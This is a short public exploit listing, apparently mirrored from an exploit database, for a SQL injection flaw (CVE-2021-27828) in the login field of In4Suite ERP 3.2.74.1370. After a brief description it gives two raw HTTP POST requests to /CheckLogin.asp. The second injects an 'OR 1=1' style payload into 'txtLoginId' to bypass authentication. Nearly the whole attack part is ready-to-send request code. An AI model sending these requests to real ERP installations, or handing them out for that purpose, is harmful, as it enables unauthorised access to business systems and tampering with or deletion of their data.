Exploit for In4Suit ERP 3.2.74.1370 - 'txtLoginId' SQL injection 2021-27828 CVE-2021-27828

Name: Exploit for In4Suit ERP 3.2.74.1370 - 'txtLoginId' SQL injection 2021-27828 CVE-2021-27828
Rating: 5 (143 reviews)

2021-05-19 | CVSS 6.4

## https://sploitus.com/exploit?id=EDB-ID:49884
# Exploit Title: In4Suit ERP 3.2.74.1370 - 'txtLoginId' SQL injection
# Date: 18/05/2021
# Exploit Author: Gulab Mondal
# Vendor Homepage: https://www.in4velocity.com/in4suite-erp.html
# Version: In4Suite ERP 3.2.74.1370
# Tested on: Windows
# CVE: CVE-2021-27828

-----------------------------------------

SQL injection in In4Suite ERP 3.2.74.1370 allows remote attackers to
modify or delete data, causing persistent changes to the application's
content or behavior by using malicious SQL queries.

--------------


# Error condition
POST /CheckLogin.asp HTTP/1.1
Host: 127.0.0.1

txtLoginId=admin&txtpassword=test&cmbLogin=Login&hdnPwdEncrypt=" "

# SQL Injection exploitation
POST /CheckLogin.asp HTTP/1.1
Host: 127.0.0.1

txtLoginId=admin OR '1=1&txtpassword=test&cmbLogin=Login&hdnPwdEncrypt="

------------------------------